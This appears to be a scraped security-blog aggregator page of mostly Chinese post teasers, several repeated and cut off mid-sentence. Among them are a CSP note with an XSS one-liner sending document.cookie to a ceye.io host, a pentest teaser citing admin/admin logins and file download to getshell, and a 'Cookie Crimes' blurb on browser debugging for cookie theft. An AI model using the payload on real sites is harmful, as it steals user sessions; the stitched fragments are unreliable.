Aggregator

看csp规则，默认是在当前域内，允许执行内联js。如果这是一道ctf的话，就很简单了， window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie传出来。 但是要是远程加载js文件是不满足csp规则的。 iframe

案例是在最近项目中遇到的俩个站，挺有意思的，所以分享出来。第一个站getshell后，内网简单的看了下，发现不是目标就没深入。 第一个站 1、弱口令 弱口令：admin admin进入网站后台 2、任意文件下载 在系统配置备份模块发现http://xxx.xxx.xxx.xxx/DownloadSe

我们提“以攻促防”想表达的点也很简单：做安全的，需要懂得攻击，发现问题，还需要懂得防御，解决问题。概念就是这么简单。剩下的呢？实战出真知。

我们提“以攻促防”想表达的点也很简单：做安全的，需要懂得攻击，发现问题，还需要懂得防御，解决问题。概念就是这么简单。剩下的呢？实战出真知。

我们提“以攻促防”想表达的点也很简单：做安全的，需要懂得攻击，发现问题，还需要懂得防御，解决问题。概念就是这么简单。剩下的呢？实战出真知。

低功耗蓝牙小工具

Revisiting Cookie Crimes

In 2018 @mangopdf described “Cookie Crimes”, which is great research around Chrome’s remote debugging feature that allows adversaries and malware to gain access to cookies quite convienently during post-exploitation.

The original research is published here, and it still works today.

The new Microsoft Edge browser and Chromium

Microsoft’s latest Edge browser is based on the same code, Chromium. I guess, you already know where this is going now…

低功耗蓝牙小工具

繁星之下，大多数人的生活都是朴实无华的，但总会有些点滴让人觉得世界是如此的美好。

COVID-19 has turned the tech world upside down. Read what a future IT director thought we did right—and what went terribly wrong.

COVID-19 has turned the tech world upside down. Read what a future IT director thought we did right—and what went terribly wrong.

一些内心独白

一些内心独白

一些内心独白

一些内心独白

MethodVisitor ClassVisitor的visitMethod能够访问到类中某个方法的一些入口信息，那么针对具体方法中字节码的访问是由MethodVisitor来进行的 访问顺序如下，其中visitCode和visitMaxs仅调用一次，标志方法字节码访问的开始和结束 MethodVi

一些内心独白

笔者近期阅读了十几个知名公司和机构的年度报告，将一些要点总结分享给大家。

笔者近期阅读了十几个知名公司和机构的年度报告，将一些要点总结分享给大家。

笔者近期阅读了十几个知名公司和机构的年度报告，将一些要点总结分享给大家。